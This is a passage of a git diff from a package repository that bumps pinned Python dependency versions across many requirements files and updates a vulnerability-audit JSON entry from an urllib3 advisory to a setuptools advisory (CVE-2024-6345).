"1.24.1", - "1.24.2", - "1.24.3", - "1.25", - "1.25.1", - "1.25.10", - "1.25.11", - "1.25.2", - "1.25.3", - "1.25.4", - "1.25.5", - "1.25.6", - "1.25.7", - "1.25.8", - "1.25.9", - "1.26.0", - "1.26.1", - "1.26.10", - "1.26.11", - "1.26.12", - "1.26.13", - "1.26.14", - "1.26.15", - "1.26.16", - "1.26.17", - "1.26.18", - "1.26.2", - "1.26.3", - "1.26.4", - "1.26.5", - "1.26.6", - "1.26.7", - "1.26.8", - "1.26.9", - "1.3", - "1.4", - "1.5", - "1.6", - "1.7", - "1.7.1", - "1.8", - "1.8.2", - "1.8.3", - "1.9", - "1.9.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-34jh-p97f-mpxf/GHSA-34jh-p97f-mpxf.json" - } + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.2.2" - } - ] - } - ], - "versions": [ - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.1.0", - "2.2.0", - "2.2.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-34jh-p97f-mpxf/GHSA-34jh-p97f-mpxf.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf" - }, { "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345" }, { "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468" + "url": "https://github.com/pypa/setuptools/pull/4332" }, { "type": "WEB", - "url": 
"https://github.com/urllib3/urllib3/commit/accff72ecc2f6cf5a76d9570198a93ac7c90270e" + "url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0" }, { "type": "PACKAGE", - "url": "https://github.com/urllib3/urllib3" + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5" } ], "database_specific": { "cwe_ids": [ - "CWE-669" + "CWE-94" ], "github_reviewed": true, - "github_reviewed_at": "2024-06-17T21:37:20Z", - "nvd_published_at": "2024-06-17T20:15:13Z", - "severity": "MODERATE" + "github_reviewed_at": "2024-07-15T16:25:38Z", + "nvd_published_at": "2024-07-15T01:15:01Z", + "severity": "HIGH" } } ], "groups": [ { "ids": [ - "GHSA-34jh-p97f-mpxf" + "GHSA-cx63-2mw6-8hw5" ], "aliases": [ - "CVE-2024-37891", - "GHSA-34jh-p97f-mpxf" + "BIT-setuptools-2024-6345", + "CVE-2024-6345", + "GHSA-cx63-2mw6-8hw5" ], - "max_severity": "4.4" + "max_severity": "8.8" } ] } diff --git a/requirements/awscli-local-requirements.txt b/requirements/awscli-local-requirements.txt index bbc80de9..f6fc9084 100644 --- a/requirements/awscli-local-requirements.txt +++ b/requirements/awscli-local-requirements.txt @@ -1,8 +1,8 @@ -boto3==1.34.128 -botocore==1.34.128 +boto3==1.35.39 +botocore==1.35.39 jmespath==1.0.1 -localstack-client==2.5 +localstack-client==2.7 python-dateutil==2.9.0.post0 -s3transfer==0.10.1 +s3transfer==0.10.3 six==1.16.0 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/cf2tf-requirements.txt b/requirements/cf2tf-requirements.txt index 3c2543f3..4444c039 100644 --- a/requirements/cf2tf-requirements.txt +++ b/requirements/cf2tf-requirements.txt 
@@ -1,18 +1,18 @@ cfn-flip==1.3.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-log==0.4.0 gitdb==4.0.11 gitpython==3.1.43 -idna==3.7 +idna==3.10 iniconfig==2.0.0 packaging==24.1 pluggy==1.5.0 -pytest==8.2.2 -pyyaml==6.0.1 -rapidfuzz==3.9.3 +pytest==8.3.3 +pyyaml==6.0.2 +rapidfuzz==3.10.0 requests==2.32.3 six==1.16.0 smmap==5.0.1 thefuzz==0.22.1 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/dolphie-requirements.txt b/requirements/dolphie-requirements.txt index d793574e..a65d94d5 100644 --- a/requirements/dolphie-requirements.txt +++ b/requirements/dolphie-requirements.txt @@ -1,4 +1,4 @@ -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 cython==3.0.11 idna==3.10 linkify-it-py==2.0.3 @@ -14,12 +14,12 @@ plotext==5.3.2 pygments==2.18.0 pymysql==1.1.1 requests==2.32.3 -rich==13.8.1 +rich==13.9.2 setuptools==75.1.0 -sqlparse==0.5.1 -textual==0.81.0 +sqlparse==0.4.4 +textual==0.56.4 textual-autocomplete==2.1.0b0 -tree-sitter==0.23.0 +tree-sitter==0.23.1 typing-extensions==4.12.2 uc-micro-py==1.0.3 urllib3==2.2.3 diff --git a/requirements/hatch-requirements.txt b/requirements/hatch-requirements.txt index bd93ce66..540a52d4 100644 --- a/requirements/hatch-requirements.txt +++ b/requirements/hatch-requirements.txt @@ -1,4 +1,4 @@ -anyio==4.6.0 +anyio==4.6.2 click==8.1.7 distlib==0.3.9 filelock==3.16.1 @@ -11,6 +11,7 @@ idna==3.10 jaraco-classes==3.4.0 jaraco-context==6.0.1 jaraco-functools==4.1.0 +jeepney==0.8.0 keyring==25.4.1 markdown-it-py==3.0.0 mdurl==0.1.2 @@ -23,11 +24,12 @@ pluggy==1.5.0 ptyprocess==0.7.0 pygments==2.18.0 rich==13.9.2 +secretstorage==3.3.3 shellingham==1.5.4 sniffio==1.3.1 tomli-w==1.1.0 tomlkit==0.13.2 -trove-classifiers==2024.9.12 +trove-classifiers==2024.10.13 userpath==1.9.2 virtualenv==20.26.6 zstandard==0.23.0 diff --git a/requirements/iconsur-requirements.txt b/requirements/iconsur-requirements.txt index c85afd18..1da30a0a 100644 --- a/requirements/iconsur-requirements.txt 
+++ b/requirements/iconsur-requirements.txt @@ -1,2 +1,2 @@ -pyobjc-core==10.1 -pyobjc-framework-cocoa==10.1 +pyobjc-core==10.3.1 +pyobjc-framework-cocoa==10.3.1 diff --git a/requirements/moto-requirements.txt b/requirements/moto-requirements.txt index 045db866..efe6af53 100644 --- a/requirements/moto-requirements.txt +++ b/requirements/moto-requirements.txt @@ -37,7 +37,7 @@ ply==3.11 py-partiql-parser==0.5.6 pydantic==2.9.2 pydantic-core==2.23.4 -pyparsing==3.1.4 +pyparsing==3.2.0 python-dateutil==2.9.0.post0 pyyaml==6.0.2 referencing==0.35.1 diff --git a/requirements/podman-compose-requirements.txt b/requirements/podman-compose-requirements.txt index 2521872e..25dfc49b 100644 --- a/requirements/podman-compose-requirements.txt +++ b/requirements/podman-compose-requirements.txt @@ -1,2 +1,2 @@ python-dotenv==1.0.1 -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/policy_sentry-requirements.txt b/requirements/policy_sentry-requirements.txt index 3cf366fc..333332f5 100644 --- a/requirements/policy_sentry-requirements.txt +++ b/requirements/policy_sentry-requirements.txt @@ -1,10 +1,10 @@ beautifulsoup4==4.12.3 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 -idna==3.7 -orjson==3.10.6 -pyyaml==6.0.1 +idna==3.10 +orjson==3.10.7 +pyyaml==6.0.2 requests==2.32.3 schema==0.7.7 -soupsieve==2.5 -urllib3==2.2.2 +soupsieve==2.6 +urllib3==2.2.3 diff --git a/requirements/psutils-requirements.txt b/requirements/psutils-requirements.txt index a232e7b6..d2c52e28 100644 --- a/requirements/psutils-requirements.txt +++ b/requirements/psutils-requirements.txt @@ -1,2 +1,2 @@ -puremagic==1.27 -pypdf==4.3.1 +puremagic==1.28 +pypdf==5.0.1 diff --git a/requirements/pyqt-builder-requirements.txt b/requirements/pyqt-builder-requirements.txt index 460f189f..f93e97d0 100644 --- a/requirements/pyqt-builder-requirements.txt +++ b/requirements/pyqt-builder-requirements.txt @@ -1,3 +1,3 @@ packaging==24.1 -setuptools==70.3.0 +setuptools==75.1.0 sip==6.8.6 
diff --git a/requirements/pyspelling-requirements.txt b/requirements/pyspelling-requirements.txt index 4c8f9de3..d0305471 100644 --- a/requirements/pyspelling-requirements.txt +++ b/requirements/pyspelling-requirements.txt @@ -1,10 +1,10 @@ -beautifulsoup4==4.12.2 -bracex==2.4 +beautifulsoup4==4.12.3 +bracex==2.5.post1 html5lib==1.1 -lxml==5.1.0 -markdown==3.5.2 +lxml==5.3.0 +markdown==3.7 +pyyaml==6.0.2 six==1.16.0 -soupsieve==2.5 -pyyaml==6.0.1 -wcmatch==8.5 +soupsieve==2.6 +wcmatch==10.0 webencodings==0.5.1 diff --git a/requirements/raven-requirements.txt b/requirements/raven-requirements.txt index 9d306ab9..62a38e4b 100644 --- a/requirements/raven-requirements.txt +++ b/requirements/raven-requirements.txt @@ -12,7 +12,7 @@ py2neo==2021.2.4 pygments==2.17.2 pytest==8.1.1 pytz==2023.3.post1 -pyyaml==6.0.1 +pyyaml==6.0.2 redis==5.0.3 requests==2.31.0 six==1.16.0 diff --git a/requirements/rpmspectool-requirements.txt b/requirements/rpmspectool-requirements.txt index 049b7463..f78ce1d8 100644 --- a/requirements/rpmspectool-requirements.txt +++ b/requirements/rpmspectool-requirements.txt @@ -1,2 +1,2 @@ -argcomplete==3.2.2 +argcomplete==3.5.1 pycurl==7.45.3 diff --git a/requirements/ruff-lsp-requirements.txt b/requirements/ruff-lsp-requirements.txt index 51d1fdfa..ab74d814 100644 --- a/requirements/ruff-lsp-requirements.txt +++ b/requirements/ruff-lsp-requirements.txt @@ -1,5 +1,5 @@ attrs==24.2.0 -cattrs==24.1.1 +cattrs==24.1.2 lsprotocol==2023.0.1 packaging==24.1 pygls==1.3.1 diff --git a/requirements/s3ql-requirements.txt b/requirements/s3ql-requirements.txt index 821fd228..58cb98d0 100644 --- a/requirements/s3ql-requirements.txt +++ b/requirements/s3ql-requirements.txt 
@@ -1,17 +1,17 @@ apsw==3.46.0.1 async-generator==1.10 -attrs==23.2.0 -cffi==1.16.0 +attrs==24.2.0 +cffi==1.17.1 defusedxml==0.7.1 dugong==3.8.2 -google-auth==2.31.0 -google-auth-oauthlib==1.2.0 -idna==3.7 +google-auth==2.35.0 +google-auth-oauthlib==1.2.1 +idna==3.10 outcome==1.3.0.post0 -pyfuse3==3.3.0 +pyfuse3==3.4.0 requests==2.32.3 setuptools==70.2.0 -trio==0.26.0 +trio==0.26.2 six==1.16.0 sniffio==1.3.1 sortedcontainers==2.4.0 diff --git a/requirements/sail-requirements.txt b/requirements/sail-requirements.txt index ea4c51cb..82a269cd 100644 --- a/requirements/sail-requirements.txt +++ b/requirements/sail-requirements.txt @@ -1,5 +1,5 @@ bcrypt==4.2.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 decorator==5.1.1 deprecated==1.2.14 @@ -9,12 +9,12 @@ idna==3.10 invoke==2.2.0 jinja2==3.1.4 jsonpickle==3.3.0 -markupsafe==2.1.5 +markupsafe==3.0.1 packaging==24.1 paramiko==3.4.0 pynacl==1.5.0 python-digitalocean==1.17.0 -pyyaml==6.0.1 +pyyaml==6.0.2 requests==2.32.3 requests-file==2.1.0 tldextract==5.1.2 diff --git a/requirements/salt-lint-requirements.txt b/requirements/salt-lint-requirements.txt index 43260867..0434384f 100644 --- a/requirements/salt-lint-requirements.txt +++ b/requirements/salt-lint-requirements.txt @@ -1,2 +1,2 @@ pathspec==0.12.1 -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/sceptre-requirements.txt b/requirements/sceptre-requirements.txt index d27e7fe2..878e76a8 100644 --- a/requirements/sceptre-requirements.txt +++ b/requirements/sceptre-requirements.txt @@ -1,17 +1,17 @@ attrs==24.2.0 -boto3==1.35.10 -botocore==1.35.10 +boto3==1.35.39 +botocore==1.35.39 cfn-flip==1.3.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 colorama==0.4.3 deepdiff==5.8.1 deprecation==2.1.0 -idna==3.8 +idna==3.10 jinja2==3.1.4 jmespath==1.0.1 jsonschema==3.2.0 -markupsafe==2.1.5 +markupsafe==3.0.1 networkx==2.6.3 ordered-set==4.1.0 packaging==24.1 
@@ -19,9 +19,9 @@ pyrsistent==0.20.0 python-dateutil==2.9.0.post0 pyyaml==6.0.2 requests==2.32.3 -s3transfer==0.10.2 +s3transfer==0.10.3 sceptre-cmd-resolver==2.0.0 sceptre-file-resolver==1.0.6 -setuptools==74.0.0 +setuptools==75.1.0 six==1.16.0 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/schemathesis-requirements.txt b/requirements/schemathesis-requirements.txt index 47ee8fd1..b1c05178 100644 --- a/requirements/schemathesis-requirements.txt +++ b/requirements/schemathesis-requirements.txt @@ -11,7 +11,7 @@ h11==0.14.0 harfile==0.3.0 httpcore==1.0.6 httpx==0.27.2 -hypothesis==6.113.0 +hypothesis==6.115.0 hypothesis-graphql==0.11.1 hypothesis-jsonschema==0.23.1 idna==3.10 @@ -48,4 +48,4 @@ uri-template==1.3.0 urllib3==2.2.3 webcolors==24.8.0 werkzeug==3.0.4 -yarl==1.14.0 +yarl==1.15.1 diff --git a/requirements/scoutsuite-requirements.txt b/requirements/scoutsuite-requirements.txt index 5d6e656c..b1719749 100644 --- a/requirements/scoutsuite-requirements.txt +++ b/requirements/scoutsuite-requirements.txt @@ -1,16 +1,16 @@ aliyun-python-sdk-actiontrail==2.2.0 -aliyun-python-sdk-core==2.15.1 -aliyun-python-sdk-ecs==4.24.73 -aliyun-python-sdk-kms==2.16.3 +aliyun-python-sdk-core==2.16.0 +aliyun-python-sdk-ecs==4.24.75 +aliyun-python-sdk-kms==2.16.5 aliyun-python-sdk-ocs==0.0.4 aliyun-python-sdk-ram==3.3.0 -aliyun-python-sdk-rds==2.7.48 +aliyun-python-sdk-rds==2.7.49 aliyun-python-sdk-sts==3.1.2 aliyun-python-sdk-vpc==3.0.45 asyncio-throttle==any.whl autocommand==2.2.2 azure-common==1.1.28 -azure-core==1.30.2 +azure-core==1.31.0 azure-identity==1.5.0 azure-mgmt-authorization==3.0.0 azure-mgmt-compute==18.2.0 
@@ -25,88 +25,89 @@ azure-mgmt-security==1.0.0
 azure-mgmt-sql==1.0.0
 azure-mgmt-storage==17.0.0
 azure-mgmt-web==1.0.0
-boto3==1.34.153
-botocore==1.34.153
-cachetools==5.4.0
-charset-normalizer==3.3.2
+boto3==1.35.39
+botocore==1.35.39
+cachetools==5.5.0
+charset-normalizer==3.4.0
 cheroot==10.0.1
 cherrypy==18.10.0
 cherrypy-cors==1.7.0
-circuitbreaker==1.4.0
+circuitbreaker==2.0.0
 coloredlogs==10.0
 crcmod==1.7
 deprecated==1.2.14
+durationpy==0.9
 google-api-core==1.34.1
-google-api-python-client==2.139.0
-google-auth==2.32.0
+google-api-python-client==2.149.0
+google-auth==2.35.0
 google-auth-httplib2==0.2.0
 google-cloud-appengine-logging==1.4.5
-google-cloud-audit-log==0.2.5
-google-cloud-container==2.50.0
+google-cloud-audit-log==0.3.0
+google-cloud-container==2.52.0
 google-cloud-core==2.4.1
 google-cloud-iam==2.15.2
 google-cloud-kms==1.3.0
-google-cloud-logging==3.11.0
+google-cloud-logging==3.11.2
 google-cloud-monitoring==1.1.0
 google-cloud-resource-manager==1.12.5
 google-cloud-storage==2.14.0
-google-crc32c==1.5.0
-google-resumable-media==2.7.1
-googleapis-common-protos==1.63.2
+google-crc32c==1.6.0
+google-resumable-media==2.7.2
+googleapis-common-protos==1.65.0
 grpc-google-iam-v1==0.12.7
-grpcio==1.65.4
+grpcio==1.66.2
 grpcio-status==1.48.2
 httpagentparser==1.9.5
 httplib2==0.22.0
 httplib2shim==0.0.3
 humanfriendly==10.0
-idna==3.7
-importlib-metadata==8.0.0
-isodate==0.6.1
-jaraco-collections==5.0.1
-jaraco-context==5.3.0
-jaraco-functools==4.0.2
+idna==3.10
+importlib-metadata==8.4.0
+isodate==0.7.2
+jaraco-collections==5.1.0
+jaraco-context==6.0.1
+jaraco-functools==4.1.0
 jaraco-text==4.0.0
 jmespath==0.10.0
-kubernetes==30.1.0
-more-itertools==10.3.0
-msal==1.30.0
+kubernetes==31.0.0
+more-itertools==10.5.0
+msal==1.31.0
 msal-extensions==0.3.1
 msgraph-core==0.2.2
 msrest==0.7.1
 netaddr==1.3.0
 oauth2client==4.1.3
 oauthlib==3.2.2
-oci==2.130.0
-opentelemetry-api==1.26.0
-oss2==2.18.6
+oci==2.135.2
+opentelemetry-api==1.27.0
+oss2==2.19.0
 policyuniverse==1.5.1.20231109
 portalocker==2.10.1
 portend==3.2.0
 proto-plus==1.24.0
 protobuf==3.20.3
-pyasn1==0.6.0
-pyasn1-modules==0.4.0
-pycryptodome==3.20.0
-pydo==0.4.0
+pyasn1==0.6.1
+pyasn1-modules==0.4.1
+pycryptodome==3.21.0
+pydo==0.5.0
 pyjwt==2.9.0
 pyopenssl==24.2.1
-pyparsing==3.1.2
+pyparsing==3.2.0
 python-dateutil==2.8.0
-pytz==2024.1
-pyyaml==6.0.1
+pytz==2024.2
+pyyaml==6.0.2
 requests==2.32.3
 requests-oauthlib==2.0.0
 rsa==4.9
-s3transfer==0.10.2
-setuptools==72.1.0
+s3transfer==0.10.3
+setuptools==75.1.0
 six==1.16.0
 sqlitedict==2.1.0
 tempora==5.7.0
 typing-extensions==4.12.2
 uritemplate==4.1.1
-urllib3==2.2.2
+urllib3==2.2.3
 websocket-client==1.8.0
 wrapt==1.16.0
 zc-lockfile==3.0.post1
-zipp==3.19.2
+zipp==3.20.2
diff --git a/requirements/scrapy-requirements.txt b/requirements/scrapy-requirements.txt
index fcd165b6..b331e7f7 100644
--- a/requirements/scrapy-requirements.txt
+++ b/requirements/scrapy-requirements.txt
@@ -1,33 +1,32 @@
 attrs==24.2.0
-automat==22.10.0
-charset-normalizer==3.3.2
+automat==24.8.1
+charset-normalizer==3.4.0
 constantly==23.10.4
 cssselect==1.2.0
 defusedxml==0.7.1
-filelock==3.15.4
+filelock==3.16.1
 hyperlink==21.0.0
-idna==3.7
+idna==3.10
 incremental==24.7.2
 itemadapter==0.9.0
-itemloaders==1.3.1
+itemloaders==1.3.2
 jmespath==1.0.1
 lxml==5.3.0
 packaging==24.1
 parsel==1.9.1
 protego==0.3.1
-pyasn1==0.6.0
-pyasn1-modules==0.4.0
+pyasn1==0.6.1
+pyasn1-modules==0.4.1
 pydispatcher==2.0.7
 pyopenssl==24.2.1
 queuelib==1.7.0
 requests==2.32.3
 requests-file==2.1.0
 service-identity==24.1.0
-setuptools==72.1.0
-six==1.16.0
+setuptools==75.1.0
 tldextract==5.1.2
 twisted==24.7.0
 typing-extensions==4.12.2
-urllib3==2.2.2
+urllib3==2.2.3
 w3lib==2.2.1
-zope-interface==7.0.1
+zope-interface==7.1.0
diff --git a/requirements/search-that-hash-requirements.txt b/requirements/search-that-hash-requirements.txt
index 87fba99c..feff6f85 100644
--- a/requirements/search-that-hash-requirements.txt
+++ b/requirements/search-that-hash-requirements.txt
@@ -1,19 +1,19 @@
 appdirs==1.4.4
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==7.1.2
 cloudscraper==1.2.71
 colorama==0.4.6
 coloredlogs==15.0.1
 commonmark==0.9.1
 humanfriendly==10.0
-idna==3.7
+idna==3.10
 loguru==0.5.3
 name-that-hash==1.10.0
 pygments==2.18.0
-pyparsing==3.1.2
+pyparsing==3.2.0
 requests==2.32.3
 requests-toolbelt==1.0.0
 rich==9.13.0
 toml==0.10.2
 typing-extensions==3.10.0.2
-urllib3==2.2.2
+urllib3==2.2.3
diff --git a/requirements/sherlock-requirements.txt b/requirements/sherlock-requirements.txt
index c721022f..f4b79f5e 100644
--- a/requirements/sherlock-requirements.txt
+++ b/requirements/sherlock-requirements.txt
@@ -1,15 +1,15 @@
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 colorama==0.4.6
 et-xmlfile==1.1.0
-idna==3.7
+idna==3.10
 openpyxl==3.1.5
-pandas==2.2.2
+pandas==2.2.3
 pysocks==1.7.1
 python-dateutil==2.9.0.post0
-pytz==2024.1
+pytz==2024.2
 requests==2.32.3
 requests-futures==1.0.1
 six==1.16.0
 stem==1.8.2
-tzdata==2024.1
-urllib3==2.2.2
+tzdata==2024.2
+urllib3==2.2.3
diff --git a/requirements/shub-requirements.txt b/requirements/shub-requirements.txt
index 12ac9e3c..5e649ed8 100644
--- a/requirements/shub-requirements.txt
+++ b/requirements/shub-requirements.txt
@@ -1,14 +1,14 @@
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 docker==7.1.0
-idna==3.7
+idna==3.10
 packaging==24.1
-pyyaml==6.0.1
+pyyaml==6.0.2
 requests==2.32.3
 retrying==1.3.4
 scrapinghub==2.4.0
-setuptools==70.0.0
+setuptools==75.1.0
 six==1.16.0
 toml==0.10.2
 tqdm==4.55.1
-urllib3==2.2.2
+urllib3==2.2.3
diff --git a/requirements/shyaml-requirements.txt b/requirements/shyaml-requirements.txt
index cf39afa6..aa4d4d06 100644
--- a/requirements/shyaml-requirements.txt
+++ b/requirements/shyaml-requirements.txt
@@ -1 +1 @@
-pyyaml==6.0.1
+pyyaml==6.0.2
diff --git a/requirements/sickchill-requirements.txt b/requirements/sickchill-requirements.txt
index 42154a06..1cdfcd05 100644
--- a/requirements/sickchill-requirements.txt
+++ b/requirements/sickchill-requirements.txt
@@ -1,67 +1,68 @@
 appdirs==1.4.4
-babelfish==0.6.0
+babelfish==0.6.1
 beautifulsoup4==4.12.3
 beekeeper-alt==2022.9.3
 bencode-py==4.0.0
 cachecontrol==0.14.0
 chardet==5.2.0
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 cinemagoer==2023.5.1
 click==8.1.7
-configobj==5.0.8
+configobj==5.0.9
 decorator==5.1.1
 deluge-client==1.10.2
-dogpile-cache==1.3.2
+dogpile-cache==1.3.3
 enzyme==0.4.1
 future==1.0.0
 gntp==1.0.3
-greenlet==3.0.3
+greenlet==3.1.1
 guessit==3.8.0
-idna==3.6
+idna==3.10
 ifaddr==0.2.0
 imagesize==1.4.1
 ipaddress==1.0.23
-jsonrpclib-pelix==0.4.3.2
+jsonrpclib-pelix==0.4.3.3
 kodipydent-alt==2022.9.3
-lxml==5.1.0
-mako==1.3.2
-markdown2==2.4.13
-markupsafe==2.1.5
-msgpack==1.0.8
+lxml==5.3.0
+mako==1.3.5
+markdown2==2.5.1
+markupsafe==3.0.1
+msgpack==1.1.0
 new-rtorrent-python==1.0.1a0
 oauthlib==3.2.2
 packaging==23.2
-pbr==6.0.0
-profilehooks==1.12.0
+pbr==6.1.0
+profilehooks==1.13.0
 putio-py==8.7.0
+pycparser==2.22
 pynma==1.0
-pyopenssl==24.0.0
+pyopenssl==24.2.1
 pysrt==1.1.2
 python-dateutil==2.9.0.post0
 python-slugify==8.0.4
 python-twitter==3.5
 python3-fanart==2.0.0
-pytz==2024.1
-qbittorrent-api==2024.2.59
-rarfile==4.1
+pytz==2024.2
+qbittorrent-api==2024.9.67
+rarfile==4.2
 rebulk==3.2.0
-requests==2.31.0
-requests-oauthlib==1.3.1
-send2trash==1.8.2
+requests==2.32.3
+requests-oauthlib==2.0.0
+send2trash==1.8.3
 setuptools==69.1.1
 six==1.16.0
-soupsieve==2.5
-sqlalchemy==2.0.27
-stevedore==5.2.0
+soupsieve==2.6
+sqlalchemy==2.0.35
+stevedore==5.3.0
 subliminal==2.1.0
 text-unidecode==1.3
 tmdbsimple==2.9.1
-tornado==6.4
+tornado==6.4.1
 tus-py==1.3.4
 tvdbsimple==1.0.6
-typing-extensions==4.10.0
+typing-extensions==4.12.2
 unidecode==1.3.8
-urllib3==2.2.1
+urllib3==2.2.3
 validators==0.22.0
 win-inet-pton==1.1.0
-xmltodict==0.13.0
+xmltodict==0.14.1
diff --git a/requirements/sigma-cli-requirements.txt b/requirements/sigma-cli-requirements.txt
index b7d8cf68..71870b9a 100644
--- a/requirements/sigma-cli-requirements.txt
+++ b/requirements/sigma-cli-requirements.txt
@@ -1,15 +1,15 @@
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 colorama==0.4.6
-idna==3.7
+idna==3.10
 jinja2==3.1.4
-markupsafe==2.1.5
-packaging==23.2
-prettytable==3.10.0
-pyparsing==3.1.2
-pysigma==0.11.8
+markupsafe==3.0.1
+packaging==24.1
+prettytable==3.11.0
+pyparsing==3.1.4
+pysigma==0.11.14
 pysigma-backend-sqlite==0.1.2
-pyyaml==6.0.1
+pyyaml==6.0.2
 requests==2.32.3
-urllib3==2.2.2
+urllib3==2.2.3
 wcwidth==0.2.13
diff --git a/requirements/sip-requirements.txt b/requirements/sip-requirements.txt
index e8df54a2..b86740bc 100644
--- a/requirements/sip-requirements.txt
+++ b/requirements/sip-requirements.txt
@@ -1,2 +1,2 @@
 packaging==24.1
-setuptools==70.3.0
+setuptools==75.1.0
diff --git a/requirements/slither-analyzer-requirements.txt b/requirements/slither-analyzer-requirements.txt
index 0159b593..10afcd36 100644
--- a/requirements/slither-analyzer-requirements.txt
+++ b/requirements/slither-analyzer-requirements.txt
@@ -1,13 +1,13 @@
-aiohappyeyeballs==2.4.0
-aiohttp==3.10.5
+aiohappyeyeballs==2.4.3
+aiohttp==3.10.10
 aiosignal==1.3.1
 attrs==24.2.0
-bitarray==2.9.2
-cbor2==5.6.4
-charset-normalizer==3.3.2
+bitarray==2.9.3
+cbor2==5.6.5
+charset-normalizer==3.4.0
 ckzg==1.0.2
 crytic-compile==0.3.7
-cytoolz==0.12.3
+cytoolz==1.0.0
 eth-abi==5.1.0
 eth-account==0.11.3
 eth-hash==0.7.0
@@ -20,14 +20,15 @@ frozenlist==1.4.1
 hexbytes==0.3.1
 idna==3.10
 jsonschema==4.23.0
-jsonschema-specifications==2023.12.1
+jsonschema-specifications==2024.10.1
 lru-dict==1.2.0
 multidict==6.1.0
 packaging==24.1
 parsimonious==0.10.0
 prettytable==3.11.0
+propcache==0.2.0
 protobuf==5.28.2
-pycryptodome==3.20.0
+pycryptodome==3.21.0
 pyunormalize==16.0.0
 referencing==0.35.1
 regex==2024.9.11
@@ -35,10 +36,10 @@ requests==2.32.3
 rlp==4.0.1
 rpds-py==0.20.0
 solc-select==1.0.4
-toolz==0.12.1
+toolz==1.0.0
 typing-extensions==4.12.2
 urllib3==2.2.3
 wcwidth==0.2.13
 web3==6.20.3
 websockets==13.1
-yarl==1.12.1
+yarl==1.15.2
diff --git a/requirements/snakemake-requirements.txt b/requirements/snakemake-requirements.txt
index 8fe9a8b2..bbfbccbc 100644
--- a/requirements/snakemake-requirements.txt
+++ b/requirements/snakemake-requirements.txt
@@ -24,7 +24,7 @@ packaging==24.1
 plac==1.4.3
 platformdirs==4.3.6
 psutil==6.0.0
-pulp==2.8.0
+pulp==2.9.0
 pyyaml==6.0.2
 referencing==0.35.1
 requests==2.32.3
@@ -38,7 +38,6 @@ snakemake-interface-report-plugins==1.1.0
 snakemake-interface-storage-plugins==3.3.0
 tabulate==0.9.0
 throttler==1.2.2
-toposort==1.10
 traitlets==5.14.3
 urllib3==2.2.3
 wrapt==1.16.0
diff --git a/requirements/subliminal-requirements.txt b/requirements/subliminal-requirements.txt
index 8b67e390..31af0d52 100644
--- a/requirements/subliminal-requirements.txt
+++ b/requirements/subliminal-requirements.txt
@@ -1,24 +1,24 @@
 babelfish==0.6.1
 beautifulsoup4==4.12.3
 chardet==5.2.0
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 click-option-group==0.5.6
 decorator==5.1.1
 dogpile-cache==1.3.3
 enzyme==0.5.2
 guessit==3.8.0
-idna==3.7
-pbr==6.0.0
-platformdirs==4.2.2
-pysubs2==1.7.2
+idna==3.10
+pbr==6.1.0
+platformdirs==4.3.6
+pysubs2==1.7.3
 python-dateutil==2.9.0.post0
 rarfile==4.2
 rebulk==3.2.0
 requests==2.32.3
 six==1.16.0
-soupsieve==2.5
+soupsieve==2.6
 srt==3.5.3
-stevedore==5.2.0
-tomli==2.0.1
-urllib3==2.2.2
+stevedore==5.3.0
+tomli==2.0.2
+urllib3==2.2.3
diff --git a/requirements/suricata-requirements.txt b/requirements/suricata-requirements.txt
index cf39afa6..aa4d4d06 100644
--- a/requirements/suricata-requirements.txt
+++ b/requirements/suricata-requirements.txt
@@ -1 +1 @@
-pyyaml==6.0.1
+pyyaml==6.0.2
diff --git a/requirements/svtplay-dl-requirements.txt b/requirements/svtplay-dl-requirements.txt
index fc900948..7e1e6478 100644
--- a/requirements/svtplay-dl-requirements.txt
+++ b/requirements/svtplay-dl-requirements.txt
@@ -1,6 +1,6 @@
-charset-normalizer==3.3.2
-idna==3.7
+charset-normalizer==3.4.0
+idna==3.10
 pysocks==1.7.1
-pyyaml==6.0.1
+pyyaml==6.0.2
 requests==2.32.3
-urllib3==2.2.2
+urllib3==2.2.3
diff --git a/requirements/sysaidmin-requirements.txt b/requirements/sysaidmin-requirements.txt
